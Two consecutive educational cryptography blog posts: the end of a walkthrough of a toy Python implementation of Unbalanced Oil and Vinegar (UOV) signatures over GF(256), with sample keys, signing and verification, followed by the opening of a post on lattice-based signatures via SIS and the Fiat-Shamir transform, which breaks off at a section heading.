UOV, in addition to being thought to be quantum-resistant, provides very short signatures as compared to other post-quantum signature schemes like lattice-based and hash-based schemes. Moreover, the actual computational operations (while seemingly complex) only require additions and multiplications of small field elements that are fast and simple to implement even on constrained hardware. The largest issue with the UOV scheme is the size of the public keys. One needs to store approximately mn^{2}/2 coefficients for public keys. Techniques exist to expand about m(n^{2} - m^{2})/2 of the coefficients for the public key from a short seed, such that we only need to store m^{3}/2 coefficients. However, this is still a very large public key: about 66KB for 128 bits of security compared to just a 384-byte key for RSA at the same security level or a 1793-byte key for the lattice-based scheme Falcon at a higher security level. Some modern candidates that use UOV as a base and how they go about trying to solve this key size problem will be discussed in the concluding remarks of this post.
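As a rough sanity check of these approximations, the counts can be computed for the toy parameters used later in this post (o=3, v=6, so m=3 and n=9). The sketch below is an assumption-laden illustration: it counts only quadratic monomials x_i x_j with i <= j, and it takes m \cdot m(m+1)/2 as the exact counterpart of the m^{3}/2 estimate. The function name is hypothetical.

```python
def quadratic_monomials(num_vars):
    """Number of monomials x_i * x_j with i <= j in num_vars variables."""
    return num_vars * (num_vars + 1) // 2

o, v = 3, 6          # toy parameters, far too small for real security
m, n = o, o + v

full_exact = m * quadratic_monomials(n)    # all quadratic coefficients
stored_exact = m * quadratic_monomials(m)  # assumed non-expandable part
expanded_exact = full_exact - stored_exact

print(full_exact, m * n**2 / 2)                   # 135 121.5
print(expanded_exact, m * (n**2 - m**2) / 2)      # 117 108.0
print(stored_exact, m**3 / 2)                     # 18 13.5
```

The approximations drop lower-order terms, so they undercount for small parameters; the gap narrows in relative terms as n grows.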

Illustrative Example

To illustrate how UOV signatures work, we wrote a toy implementation of a UOV scheme in Python 3. The code is available here. It goes without saying that it is just for educational purposes and should not be used in any application desiring any real level of security. We will walk through the signing process step-by-step, stopping to examine all values and intermediaries. We use NumPy to store polynomials in quadratic form, store our secret trapdoor linear transformation L, and to do linear algebra. We do note that our UOV implementation is a slight simplification of the general description we give above. We discuss this next.

Simplification

In our above presentation of the UOV scheme we define our central map \mathcal{F} such that it contains not only quadratic terms, but also linear and constant terms. As a result, the public verification key \mathcal{P} also contains said terms. For the simplified variant we set these linear and constant terms to 0, and are left with only quadratic terms, that is, our central map \mathcal{F} is a collection of homogeneous polynomials of degree two. This simplified variant \mathcal{F} is an ordered collection of o functions that can be expressed in the form: f_k(X_1,\ldots,X_n) = \sum_{i,j} a_{i,j,k} O_i V_j + \sum_{i,j} b_{i,j,k} V_i V_j where k \in [1 \ldots o] and all coefficients are in \mathbb{F}_{q}. This simplification presents a number of advantages. Namely, each component f_k of \mathcal{F} can be written as a quadratic form given by an upper triangular matrix in \mathbb{F}_{q}^{n \times n}. For the below example we set o=2,v=4.

Note that oil variables do not mix, so we have a block zero matrix in the upper-left of this representation. Further, this allows us to define our secret transformation L to be in GL_{n}(\mathbb{F}_q) where GL is the general linear group. That is (for our purposes) L is an invertible matrix with dimensions n \times n and entries in our field \mathbb{F}_q. One can always turn a homogeneous system of polynomial equations in n variables into an equivalent system in n-1 variables by fixing one of the variables to 1. The reverse process is called homogenization. Thus, we still preserve the structure of the UOV signing key with this simplification. In turn, from the point of view of a key-recovery attack, the security of this simplified variant of UOV is equivalent to that of original UOV with n-1 indeterminates.
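The dehomogenization step can be made concrete with a small check. In the sketch below, which is an illustration rather than part of the post's implementation, a homogeneous quadratic in n variables is stored as an upper triangular matrix over GF(2^8), and fixing the last variable to 1 is shown to give a quadratic with linear and constant terms in n-1 variables. The field polynomial and all helper names are assumptions.

```python
import random

def gf_mul(a, b, poly=0x11D):
    """Multiply in GF(2^8); the reduction polynomial is an assumed choice."""
    result = 0
    while b:
        if b & 1:
            result ^= a
        a <<= 1
        if a & 0x100:
            a ^= poly
        b >>= 1
    return result

def quad_form(M, x):
    """Evaluate the sum over i <= j of M[i][j] * x_i * x_j."""
    acc = 0
    for i in range(len(x)):
        for j in range(i, len(x)):
            acc ^= gf_mul(M[i][j], gf_mul(x[i], x[j]))
    return acc

def dehomogenize(M):
    """Split M into quadratic, linear and constant parts for x_n = 1."""
    n = len(M)
    quad = [row[:n - 1] for row in M[:n - 1]]
    linear = [M[i][n - 1] for i in range(n - 1)]
    const = M[n - 1][n - 1]
    return quad, linear, const

def evaluate_inhomogeneous(quad, linear, const, y):
    acc = quad_form(quad, y) ^ const
    for coeff, y_i in zip(linear, y):
        acc ^= gf_mul(coeff, y_i)
    return acc

rng = random.Random(7)
n = 6
M = [[rng.randrange(256) if j >= i else 0 for j in range(n)] for i in range(n)]
quad, linear, const = dehomogenize(M)
y = [rng.randrange(256) for _ in range(n - 1)]

# The homogeneous form at (y, 1) equals the inhomogeneous polynomial at y.
print(quad_form(M, y + [1]) == evaluate_inhomogeneous(quad, linear, const, y))
```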

Parameters

A note on presentation: As opposed to above where we used \LaTeX typesetting for math, we will keep our mathematical notation in the prose in line with our choices in the code. That is, we will use inline code blocks to typeset variable names and math (e.g. F is our central map). We will work over the field GF(256). We use the galois package to do array arithmetic and linear algebra over the field. For more information about how to do arithmetic in Galois (finite) fields see this Wikipedia page. For this example we set o=3 and v=2o=6. These parameters are far too small to provide actual security, but work nicely for our illustrative example. Below is the parameter information our implementation prints.

Galois Field:
  name: GF(2^8)
  characteristic: 2
  degree: 8
  order: 256
  irreducible_poly: x^8 + x^4 + x^3 + x^2 + 1
  is_primitive_poly: True
  primitive_element: x

The parameters are o=3 and v=6.
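To make the field arithmetic concrete, here is a minimal pure-Python sketch of addition and multiplication in GF(2^8), using the irreducible polynomial printed above. The helper names gf256_add and gf256_mul are hypothetical and are not part of the galois package, which handles these operations for us in the actual implementation.

```python
# Minimal sketch of GF(2^8) arithmetic; the helper names are illustrative only.
IRREDUCIBLE_POLY = 0x11D  # bit pattern of x^8 + x^4 + x^3 + x^2 + 1

def gf256_add(a, b):
    """Addition (and subtraction) is coefficient-wise XOR in characteristic 2."""
    return a ^ b

def gf256_mul(a, b):
    """Shift-and-add multiplication, reducing modulo IRREDUCIBLE_POLY."""
    result = 0
    while b:
        if b & 1:
            result ^= a          # add the current multiple of a
        a <<= 1                  # multiply a by x
        if a & 0x100:
            a ^= IRREDUCIBLE_POLY  # reduce when the degree reaches 8
        b >>= 1
    return result

# The primitive element x (the integer 2) should generate every non-zero element.
powers = set()
element = 1
for _ in range(255):
    powers.add(element)
    element = gf256_mul(element, 2)
print(len(powers))  # number of distinct powers of x
```

Because the characteristic is 2, every element is its own additive inverse, so subtraction and addition are the same operation.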

Key Generation

Private (Signing) Key

To generate the central map F, we generate o random multivariate polynomials in the style described in the simplified UOV scheme. Each polynomial is stored as an n x n = (o+v) x (o+v) NumPy matrix. The complete central map is an o-length list of these matrices.

def generate_random_polynomial(o,v):
    f_i = np.vstack(
    (np.hstack((np.zeros((o,o),dtype=np.uint8),np.random.randint(256, size=(o,v), dtype=np.uint8))),
    np.random.randint(256, size=(v,v+o),dtype=np.uint8))
    )
    f_i_triu = np.triu(f_i)
    return GF256(f_i_triu)

def generate_central_map(o,v):
    F = []
    for _ in range(o):
        F.append(generate_random_polynomial(o,v))
    return F

To generate our secret transformation L, we generate a random n x n matrix and ensure that it is invertible, as this will be necessary to compute signatures.

def generate_affine_L(o,v):
    found = False
    while not found:
        try:
            L_n = np.random.randint(256, size=(o+v,o+v), dtype=np.uint8)
            L = GF256(L_n)
            L_inv = np.linalg.inv(L)
            found = True
        except np.linalg.LinAlgError:
            # L is singular: sample a new candidate
            found = False
    return L, L_inv

Then, we have a wrapper function that generates our private key using the above functions as the triple (F, L, L_inv). We deviate from the standard definition of the signing key by also storing the inverse of L, denoted L_inv.

def generate_private_key(o,v): 
    F = generate_central_map(o,v)
    L, L_inv = generate_affine_L(o,v)
    return F, L, L_inv

When we run this key generation code for our simple example, we get the following private key. We can see that F consists of three homogeneous quadratics, where the entries in the matrices are the coefficients of said quadratics. Note the 0 entries where oil-times-oil terms would have coefficients (they do not mix)! Moreover, we only need an upper-triangular matrix, as the entries at i,j and j,i for all i,j in [1...n] would specify the coefficient of the same monomial.

Private Key:

F (Central Map) = 
0:
 [[  0   0   0 153 175 153  51 224  89]
 [  0   0   0  20 143  18 179  13 175]
 [  0   0   0  74 231 146 106 136 149]
 [  0   0   0 248 197  59  50  41  57]
 [  0   0   0   0 213  77 187 165  54]
 [  0   0   0   0   0  97 154  37 163]
 [  0   0   0   0   0   0  93 246  71]
 [  0   0   0   0   0   0   0 181 188]
 [  0   0   0   0   0   0   0   0   3]]

1:
 [[  0   0   0  71  26 115   9 248 114]
 [  0   0   0  31  53 162  77  82  46]
 [  0   0   0 254 178  43 219 124 196]
 [  0   0   0 150  85 216  38  28 197]
 [  0   0   0   0 147  73 216 111  98]
 [  0   0   0   0   0  30 140 222  36]
 [  0   0   0   0   0   0 108  54 105]
 [  0   0   0   0   0   0   0 253  38]
 [  0   0   0   0   0   0   0   0  55]]

2:
 [[  0   0   0  98  27 252 165  31  42]
 [  0   0   0 180 169 247 143 217 128]
 [  0   0   0  13 111  90  98  40 233]
 [  0   0   0 223 243 229 156 183  45]
 [  0   0   0   0  40 136  12 123  44]
 [  0   0   0   0   0 251  92  77 174]
 [  0   0   0   0   0   0  81 150  95]
 [  0   0   0   0   0   0   0 196 207]
 [  0   0   0   0   0   0   0   0 108]]
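The zero oil-by-oil block is what makes signing tractable: once the vinegar variables are fixed, each polynomial becomes affine in the oil variables. The following sketch checks this on a toy example. The sizes (o=2, v=2), the coefficients, and the helper names are all made up for illustration; only the field polynomial matches the parameters above.

```python
# Sketch only: toy sizes (o=2, v=2) and made-up coefficients over GF(2^8).
def gf256_mul(a, b, poly=0x11D):
    """Multiply in GF(2^8) modulo x^8 + x^4 + x^3 + x^2 + 1."""
    result = 0
    while b:
        if b & 1:
            result ^= a
        a <<= 1
        if a & 0x100:
            a ^= poly
        b >>= 1
    return result

def evaluate(f, x):
    """Evaluate the sum over i <= j of f[i][j] * x[i] * x[j]; addition is XOR."""
    total = 0
    for i in range(len(x)):
        for j in range(i, len(x)):
            total ^= gf256_mul(f[i][j], gf256_mul(x[i], x[j]))
    return total

def is_affine_in_oil(f, vinegar):
    """Check f(o1, o2, vinegar) == c1*o1 + c2*o2 + c0 on a grid of oil values."""
    c0 = evaluate(f, [0, 0] + vinegar)
    c1 = evaluate(f, [1, 0] + vinegar) ^ c0
    c2 = evaluate(f, [0, 1] + vinegar) ^ c0
    return all(
        evaluate(f, [o1, o2] + vinegar)
        == gf256_mul(c1, o1) ^ gf256_mul(c2, o2) ^ c0
        for o1 in range(0, 256, 5)
        for o2 in range(0, 256, 7)
    )

f = [
    [0, 0, 17, 203],  # oil rows: zero oil-by-oil block, then oil-by-vinegar
    [0, 0, 91, 5],
    [0, 0, 64, 130],  # vinegar rows: upper-triangular vinegar-by-vinegar block
    [0, 0, 0, 77],
]
vinegar = [9, 200]    # arbitrary fixed vinegar values
print(is_affine_in_oil(f, vinegar))
```

Placing a non-zero coefficient in the oil-by-oil block (for example f[0][1]) introduces an o1*o2 term, and the same check then fails.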

Further, we show L and L_inv and confirm that they were generated correctly, as their product is the identity matrix, that is L · L_inv = I.

Secret Transformation L=:
[[  0 207  67 204  15  76 173  14  42]
 [193  54  49  19  64 222  93 165 108]
 [102 211 114  71  22 229 187 221 194]
 [196 251  77 219 159   4 110 107 241]
 [ 78  88  49 133 238 243  17 125 203]
 [ 95 159 145 105 221  55 185 165  24]
 [ 45  55  31  37 149 168   4  21  48]
 [163 127 150 135  56 210 241 110  25]
 [222   3 207 202 136  66 121  18 119]]

Secret Inverse Transformation L_inv=:
[[127 172  42  59  73  10 183 116  70]
 [ 33 153 229 239 106  99 227  54  51]
 [218 196 248  10 124  46  25  73 128]
 [ 15  36 200  28 138 156 210 164 229]
 [114 107 134 126  40 230 238 249  70]
 [ 88 100  51 161 145  52 157 138 130]
 [208 188  30 227  66 116 191 100 183]
 [172  88 227 121 142 132 247 223  18]
 [138 145 247 168 180  35 185 149  67]]

Confirming L is invertible as L*L_inv is I=:
 [[1 0 0 0 0 0 0 0 0]
 [0 1 0 0 0 0 0 0 0]
 [0 0 1 0 0 0 0 0 0]
 [0 0 0 1 0 0 0 0 0]
 [0 0 0 0 1 0 0 0 0]
 [0 0 0 0 0 1 0 0 0]
 [0 0 0 0 0 0 1 0 0]
 [0 0 0 0 0 0 0 1 0]
 [0 0 0 0 0 0 0 0 1]]

Public (Verification) Key

We compute our public verification key by computing the composition f ∘ L for each f in F. This is made easy as we can do this in quadratic form: each f_p in P is computed as L_T · f · L for the corresponding f in F, where L_T is the transpose of L.

def generate_public_key(F,L):
    L_T = np.transpose(L)
    P = []
    for f in F:
        s1 = np.matmul(L_T,f)
        s2 = np.matmul(s1,L)
        P.append(s2) 
    return P
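The reason this matrix product gives the composed polynomial is the identity s_T · (L_T · f · L) · s = (L · s)_T · f · (L · s). The sketch below checks that identity on a toy example. To stay dependency-free it uses integers modulo the prime 7 as a stand-in for GF(256), and the matrices f and L as well as the helper names are assumptions chosen only for illustration.

```python
# Sketch only: arithmetic modulo the prime 7 stands in for GF(256).
Q = 7

def matmul(a, b):
    """Multiply two matrices (lists of rows) modulo Q."""
    return [[sum(x * y for x, y in zip(row, col)) % Q for col in zip(*b)]
            for row in a]

def transpose(a):
    """Return the transpose of a matrix given as a list of rows."""
    return [list(col) for col in zip(*a)]

def quad_form(f, x):
    """Compute x^T * f * x modulo Q for a vector x given as a flat list."""
    column = [[xi] for xi in x]
    return matmul(matmul(transpose(column), f), column)[0][0]

# Toy central polynomial with o=1, v=2 (zero oil-by-oil entry) and a toy L.
f = [[0, 3, 5],
     [0, 2, 6],
     [0, 0, 4]]
L = [[1, 2, 0],
     [0, 1, 3],
     [4, 0, 1]]

p = matmul(matmul(transpose(L), f), L)  # public polynomial L^T * f * L

s = [2, 5, 1]                           # an arbitrary input vector
Ls = [row[0] for row in matmul(L, [[si] for si in s])]
print(quad_form(p, s), quad_form(f, Ls))  # the two values agree
```

This is why a signature of the form s = L_inv · x verifies: evaluating the public key at s is the same as evaluating the central map at L · s = x.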

The following is our collection of o=3 polynomials that make up our public verification key P again represented as a list of matrices, that result from the above calculation using F and L that we generated as our private key.

Public Key = F ∘ L = 

0:
[[246  74 117 248  72   5 143 224 135]
 [116  10  17 156  68 243 203 128 192]
 [148 215 239 220 212  65 184 253 214]
 [211 116 203 186  61  26 104  21 157]
 [155  87  23 174  10 242  98 215 238]
 [189 209 203 142 221 105 179 173   8]
 [109  27 161 201 155 133 197 180  66]
 [227 228 150  92 248  73 213 205 192]
 [ 51  30 193 111 242 244  74 177 154]]

1:
[[ 92 131 253  40 192 243 101 228 217]
 [114  70  34 148 150 144  29  53 193]
 [127 161   2 248  42 126 245 122 175]
 [249  59 218  30  46 114  58 214  97]
 [ 12 212 246 155  93  76 168 162 120]
 [108  53 107 153   7 216 233 137  93]
 [249 177  82 164   4 117  25 179 152]
 [107 105 135  34 189  97  53  29  38]
 [140 127 214 137 206 171  45 109 110]]

2:
[[156  73  34 203 141 187  88  54 168]
 [ 90 252 145  72 161 130  93 150 169]
 [112 158  75   6 174 157 206 192 193]
 [214 198 116 243 190 194 214  22   5]
 [ 74 231 235 113 151  91  75 122 123]
 [200  77 208 125  99 169 229 104  55]
 [184 128  22  88  42 170 139 233 189]
 [ 27 149  64  89  77 158 248  65 150]
 [ 93  59 212 106 143 221  24 178 242]]

Signing

To sign we first define some helper functions. The first picks v=6 random vinegar variable values rvv as specified in the signing algorithm.

def generate_random_vinegar(v):
    vv = np.random.randint(256, size=v, dtype=np.uint8)
    rvv = GF256(vv)
    return rvv

We then substitute this selection of random vinegar variables rvv in each f in F, collecting terms such that the only remaining unknowns will be o1,o2,o3 – our oil variables.

def sub_vinegar_aux(rvv,f,o,v):
    coeffs = GF256([0]* (o+1))
    # oil variables are in 0 <= i < o
    # vinegar variables are in o <= i < n
    for i in range(o+v):
        for j in range(i,o+v):
            # by cases
            # oil and oil do not mix
            if i < o and j < o:
                pass
            # vinegar and vinegar variables contribute to the constant term
            elif i >= o and j >= o:
                ij = GF256(f[i,j])
                vvi = GF256(rvv[i-o])
                vvj = GF256(rvv[j-o])
                coeffs[-1] += np.multiply(np.multiply(ij,vvi), vvj)
            # have mixed oil and vinegar variables that contribute to o_i coeff
            elif i < o and j >= o:
                ij = GF256(f[i,j])
                vvj = GF256(rvv[j-o])
                coeffs[i] += np.multiply(ij,vvj)
            # condition is not hit as we have covered all combos
            else:
                pass
    return coeffs

We collect the equations once the fixed random vinegar variables have been substituted (only leaving our unknown oil variables). This will be a linear system of o=3 equations in o=3 unknowns – which is easy to solve!

def sub_vinegar(rvv,F,o,v):
    subbed_rvv_F = []
    for f in F:
        subbed_rvv_F.append(sub_vinegar_aux(rvv,f,o,v))
    los = GF256(subbed_rvv_F)
    return los

To solve the system, we separate the coefficients of the unknown oil variables, M, from the constant terms c. We then take our message m (a vector of o elements of GF(256)) and subtract c from it to form the right-hand side y. We solve M · x = y for x. Finally, we stack x on top of the selected random vinegar variables rvv and compute the signature s for m as the product of the inverse of our secret transformation, L_inv, with this stacked vector.

def sign(F,L_inv,o,v,m):
    signed = False
    while not signed:
        try:
            rvv = generate_random_vinegar(v)
            los = sub_vinegar(rvv,F,o,v)
            M = GF256(los[:, :-1])
            c = GF256(los[:, [-1]])
            y = np.subtract(m,c)
            x = np.vstack((np.linalg.solve(M,y), rvv.reshape(v,1)))
            s = np.matmul(L_inv, x)
            signed = True
        except np.linalg.LinAlgError:
            # the oil system is singular: retry with fresh vinegar values
            signed = False
    return s

For this example we select m=[10,25,11], the birthday (October 25, 1811) of Évariste Galois, the father of finite fields.

m =
[[10]
 [25]
 [11]]

We then select our random vinegar values rvv.

rvv = [120 104 210   3   0 154]

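After substitution we are left with the following linear system: the first three columns are the coefficients M of the oil variables, and the last column holds the constant terms c.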

M =
[[252 223  17 183]
 [200 254 141 176]
 [116 200  15  43]]

We separate out the constant terms c of the linear oil system and subtract them from the message values m and solve the linear system using Gaussian elimination.

y = m-c =
 [[10]
 [25]
 [11]] 
-
 [[183]
 [176]
 [ 43]]
 =
 [[189]
 [169]
 [ 32]]

f(o1,o2,o3) =
 [[252 223  17]
 [200 254 141]
 [116 200  15]]|[[189]
 [169]
 [ 32]]

This yields the solution o1,o2,o3 =
 [[68]
 [49]
 [94]]
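As a cross-check, the values printed above can be reproduced with a few lines of pure Python, assuming the field polynomial x^8 + x^4 + x^3 + x^2 + 1 from the parameters section. The helpers gf256_mul and gf256_dot are hypothetical stand-ins for what the galois package does internally. Subtraction in GF(256) is XOR, so y is simply m XOR c.

```python
# Sketch only: re-derive y = m - c and check M * x = y with the numbers above.
def gf256_mul(a, b, poly=0x11D):
    """Multiply in GF(2^8) modulo x^8 + x^4 + x^3 + x^2 + 1."""
    result = 0
    while b:
        if b & 1:
            result ^= a
        a <<= 1
        if a & 0x100:
            a ^= poly
        b >>= 1
    return result

def gf256_dot(row, vec):
    """Dot product over GF(2^8); the sum is an XOR of the products."""
    total = 0
    for a, b in zip(row, vec):
        total ^= gf256_mul(a, b)
    return total

m = [10, 25, 11]
system = [[252, 223, 17, 183],
          [200, 254, 141, 176],
          [116, 200, 15, 43]]
M = [row[:-1] for row in system]   # coefficients of the oil variables
c = [row[-1] for row in system]    # constant terms

y = [mi ^ ci for mi, ci in zip(m, c)]  # subtraction is XOR in characteristic 2
x = [68, 49, 94]                       # solution reported above
Mx = [gf256_dot(row, x) for row in M]

print(y)   # [189, 169, 32]
print(Mx)  # [189, 169, 32]
```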

We stack this solution x with our random vinegar variables rvv to form a complete solution to the non-linear multivariate polynomial system of equations:

[x | rvv] =
 [[ 68]
 [ 49]
 [ 94]
 [120]
 [104]
 [210]
 [  3]
 [  0]
 [154]]

We can check our solution by plugging it into the central map.

m = x_T · F · x =
 [[10]
 [25]
 [11]]

We see that this check works, and we finally compute our signature as:

s = L_inv · x =
 [[ 50]
 [ 79]
 [107]
 [122]
 [209]
 [241]
 [ 80]
 [173]
 [241]]

Verification

To verify the message we simply compute P(s1,s2,...,sn) and check that the result (our computed message) is equal to the corresponding original message. This is made easy as we can do this in quadratic form, thus for each f_p in P we compute s_T · f_p · s where s_T is the transpose of s.

def verify(P,s,m):
    cmparts= []
    s_T = np.transpose(s)
    for f_p in P:
        cmp1 = np.matmul(s_T,f_p)
        cmp2 = np.matmul(cmp1,s)
        cmparts.append(cmp2[0])
    computed_m = GF256(cmparts)
    return computed_m, np.array_equal(computed_m,m)

Now let’s see if our signature is correct given our public_key and message.

computed_message = s_T · P · s=
[[10]
 [25]
 [11]]

computed_message == message is True

Hey, it works!

Exhaustive Test

As a sanity check we wrote a test function that generates a random private/public key pair for the small parameters o=2, v=4. We continue to work over the field GF(256). With these parameters, the messages we sign are vectors of 2 field elements in GF(256). As field elements take on values in the range 0 to 255, there are 256**2 = 65536 total messages in the message space. We generate all messages in the message space and check that we can generate valid signatures for all of them.

# test over the entire space of messages for small parameters
def test():
    o = 2 
    v = 4
    F, L, L_inv = generate_private_key(o,v) # signing key
    P = generate_public_key(F,L) # verification key

    total_tests = 0
    tests_passed =0

    for m1 in range(256):
     for m2 in range(256):
         total_tests+=1
         m = GF256([[m1],[m2]])
         s = sign(F,L_inv,o,v,m)
         computed_m,verified = verify(P,s,m)
         if verified:
             tests_passed+=1
         print(f"Test: {total_tests}\nMessage:\n{m}\nSignature:\n{s}\nVerified:\n{verified}\n")
    
    print(f"{tests_passed} out of {total_tests} messages verified.")

We now look at the output of the test and see that we were able to generate signatures for every message in the message space. This instills confidence in the validity of our implementation. The full test_results.txt file for one random key pair is included in the GitHub repository of our implementation that is linked above.

Test: 1
Message:
[[0]
 [0]]
Signature:
[[ 53]
 [211]
 [161]
 [  6]
 [228]
 [124]]
Verified:
True
.
.
.
Test: 65536
Message:
[[255]
 [255]]
Signature:
[[144]
 [ 98]
 [143]
 [  0]
 [124]
 [122]]
Verified:
True

65536 out of 65536 messages verified.

Concluding Remarks

Multivariate cryptography has seen renewed interest recently due to the call for the standardization of post-quantum cryptography. Recall that the main issue with UOV signature schemes is that the public keys are huge. Many contemporary schemes have tried to solve this issue. For instance, Rainbow is a scheme based on a layered UOV approach that reduces the size of the public key. It was selected as one of the three NIST post-quantum signature finalists. However, a key recovery attack was discovered by Beullens and Rainbow is no longer considered secure. Note that this attack does not break UOV, just Rainbow. Furthermore, MAYO was put forth as a possible post-quantum signature candidate in NIST’s call for additional PQC signatures. MAYO uses small public keys, comparable to those of lattice-based schemes, that are “whipped-up” during signing and verification – for details go to the MAYO website. In addition to exploring Rainbow and MAYO, it may interest the reader to explore Hidden Field Equations, which is another construction of multivariate cryptography schemes.

Acknowledgments

Thank you to Paul Bottinelli and Elena Bakos Lang for their thorough reviews and thoughtful feedback on this blog post. All remaining errors are the author’s.

Building Intuition for Lattice-Based Signatures – Part 2: Fiat-Shamir with Aborts

Introduction

This two-part blog series aims to build some intuition for the main techniques that are used to construct lattice-based signatures, focusing in particular on the techniques underlying Falcon and Dilithium, the two lattice-based signature schemes selected for standardization by the National Institute of Standards and Technology (NIST). In part 1 of this two-part blog post (Building Intuition for Lattice-Based Signatures – Part 1: Trapdoor Signatures), we covered how to build lattice-based trapdoor signatures based on the hardness of the Closest Vector Problem (CVP) using the hash-and-sign paradigm, which lies at the core of Falcon.

In this second part, we will describe an alternative construction of lattice-based signatures relying on the hardness of the Shortest Vector Problem (SVP) and the Fiat-Shamir paradigm, which is used as a basis for the signature scheme Dilithium. For a quick refresher on lattice theory and notation that will be used throughout this post, see the Lattice Background section in part 1 of this blog post.

Constructing Signatures Using Fiat-Shamir and the SVP

Recall that the SVP_\gamma problem asks to find a short lattice vector of length at most a multiplicative approximation factor \gamma \geq 1 of the length of the shortest (non-zero) vector in the lattice. In order to construct a lattice-based signature scheme based on SVP_\gamma, we focus on a special case of the SVP_\gamma problem instantiated on q-ary lattices, known as the Short Integer Solution (SIS) problem. Formally, SIS_{n,m,q,\beta} can be defined as follows. Given A \in \mathbb{Z}_q^{n \times m}, find a short non-zero \vec{z} \in \mathbb{Z}^m in the q-ary lattice \Lambda^\perp(A) satisfying A\vec{z} \equiv \vec{0} \mod q and \|\vec{z}\| \leq \beta. (Note that any norm can be used here. Common choices include the \ell_2 and \ell_\infty norms.)

The SIS problem lends itself well to constructing cryptographic primitives. If we choose our domain to be a set of short vectors, then we can show the function \vec{x} \to A\vec{x} is in fact a hash function (see footnote 1) which is collision-resistant and one-way.

Indeed, let D_b^m = \{\vec{x} \in \mathbb{Z}^m: \|\vec{x}\|_\infty \leq b\} and suppose we define the hash function f_A: D_b^m \to \mathbb{Z}_q^n by f_A(\vec{x}) = A\vec{x} \mod{q}. If we could find a collision, that is, distinct \vec{x}_1, \vec{x}_2 \in D_b^m such that A\vec{x}_1 \equiv A\vec{x}_2 \mod{q}, then \vec{x}_1 - \vec{x}_2 is a solution to the SIS_{n,m,q,\beta = 2b} problem. Indeed, we have that A\vec{x}_1 - A\vec{x}_2 = A(\vec{x}_1 - \vec{x}_2) \equiv \vec{0} \mod{q} and, since both \vec{x}_1 and \vec{x}_2 are short, we know \vec{x}_1 - \vec{x}_2 is also bounded, with \|\vec{x}_1 - \vec{x}_2\|_\infty \leq \|\vec{x}_1\|_\infty + \|\vec{x}_2\|_\infty \leq 2b, and hence is a solution to SIS_{n,m,q,\beta = 2b}.
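The reduction from collisions to SIS solutions can be observed on a toy instance. In the sketch below, the parameters q, n, m, b and the matrix A are arbitrary small values chosen for illustration (they offer no security). Since the domain has 3^4 = 81 elements and the range only 5^2 = 25, a collision must exist, and a brute-force search finds one.

```python
from itertools import product

# Toy parameters (assumptions for illustration only).
q, n, m, b = 5, 2, 4, 1
A = [[1, 2, 3, 4],
     [2, 0, 1, 3]]

def f_A(x):
    """The map x -> A*x mod q, returned as a tuple so it can be a dict key."""
    return tuple(sum(a * xi for a, xi in zip(row, x)) % q for row in A)

# Search the short vectors in {-b, ..., b}^m for two inputs with equal images.
seen = {}
collision = None
for x in product(range(-b, b + 1), repeat=m):
    image = f_A(x)
    if image in seen:
        collision = (seen[image], x)
        break
    seen[image] = x

x1, x2 = collision
z = [u - w for u, w in zip(x1, x2)]  # difference of the colliding inputs
print(z, f_A(z))  # z is non-zero, short, and maps to the zero vector
```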

We will now show how to use this one-way function to construct lattice-based identification schemes and signatures.

Signature Schemes from Identification Schemes

In order to use SIS as the hard problem at the heart of a lattice-based signature scheme, we use a construction based on identification schemes. In general, one can use a one-way function to construct an identification scheme, which can then in turn be used to construct a signature scheme using the Fiat-Shamir transform as follows.

A commit-challenge-response identification protocol can be used for Alice to prove knowledge of some secret information (such as a private key \mathrm{sk}, corresponding to a public key \mathrm{pk}). It consists of three main steps: First, Alice chooses a random (secret) value y, and computes a commitment to y using a one-way function f(y), which she sends to Bob. Then, Bob responds to this with a random challenge c. Finally, Alice provides a response combining y, c and the secret key \mathrm{sk} in such a way that it can be verified using the commitment f(y) and the public key \mathrm{pk}, but no information about \mathrm{sk} is leaked.

As an example, suppose Alice wants to prove to Bob that she knows s, the discrete logarithm of S = g^s \in \mathbb{Z}_q. One method of doing so is the Chaum Identification Scheme:

Note that someone impersonating Alice (i.e. someone who does not know sk = s) would be able to return an answer that Bob accepts at most 1/2 of the time, as they can choose a commitment that verifies correctly either in the case of c=0 or in the case of c=1 (but not both). Repeating this interaction k times (successfully) would thus convince Bob that the person he is interacting with is Alice with probability 1 - 1/2^k. This process can be parallelized, as is done in Schnorr’s Identification Scheme:

The main downside of this process is the requirement for it to be interactive, as it incurs communication costs, and requires Alice to be available when proving her identity.

To avoid those drawbacks, one can use the Fiat-Shamir heuristic – a method to transform an interactive identification scheme such as the ones above to a non-interactive signature scheme. The basic idea is to replace the challenge with the output of a random oracle (in practice, a cryptographic hash function is used instead) that depends on the message and public values.

For the example above, the identification scheme can be adapted to generate Schnorr (non-interactive) signatures as follows:

KeyGen():

1. \mathrm{sk}: s \leftarrow \mathbb{Z}_q \setminus \{0\}
2. \mathrm{pk}: g^s, where g is a public value that generates \mathbb{Z}_q

Sign(s, m):

1. y\leftarrow\mathbb{Z}_q\setminus\{0\}
2. c=H(g^y, m)
3. z = cs + y
4. Return signature \sigma = (z, g^y)

Verify(g^s, m, \sigma = (z, g^y)):

1. c' = H(g^y, m)
2. Output g^z == (g^s)^{c'} g^y

Equivalently, the signer could instead send the signature \sigma = (z, c), in which case the verifier computes g^{y'} = g^z(g^s)^{-c} and checks that c == H(g^{y'}, m) to check that it was properly generated.
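The signing and verification steps above can be sketched in a few lines of Python. The group used here is an assumption made for illustration: g = 2 generates the subgroup of prime order q = 11 of the integers modulo p = 23, which is far too small to be secure. The hash-to-challenge function H is likewise a hypothetical instantiation built on SHA-256.

```python
import hashlib
import secrets

# Toy parameters (assumptions, insecure): g has prime order q modulo p.
p, q, g = 23, 11, 2

def H(commitment, message):
    """Hash the commitment and the message to a challenge in Z_q."""
    data = str(commitment).encode() + b"|" + message
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % q

def keygen():
    s = secrets.randbelow(q - 1) + 1      # secret key in {1, ..., q-1}
    return s, pow(g, s, p)                # (sk, pk = g^s)

def sign(s, message):
    y = secrets.randbelow(q - 1) + 1      # fresh secret nonce
    commitment = pow(g, y, p)             # g^y
    c = H(commitment, message)
    z = (c * s + y) % q                   # exponents live modulo the order q
    return z, commitment

def verify(pk, message, signature):
    z, commitment = signature
    c = H(commitment, message)
    # Accept when g^z == (g^s)^c * g^y.
    return pow(g, z, p) == (pow(pk, c, p) * commitment) % p

sk, pk = keygen()
sig = sign(sk, b"hello")
print(verify(pk, b"hello", sig))
```

The check works because g^z = g^{cs + y} = (g^s)^c g^y. The nonce y must be fresh and secret for every signature, since z = cs + y reveals s to anyone who learns y.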

Lattice-Based Identification Schemes

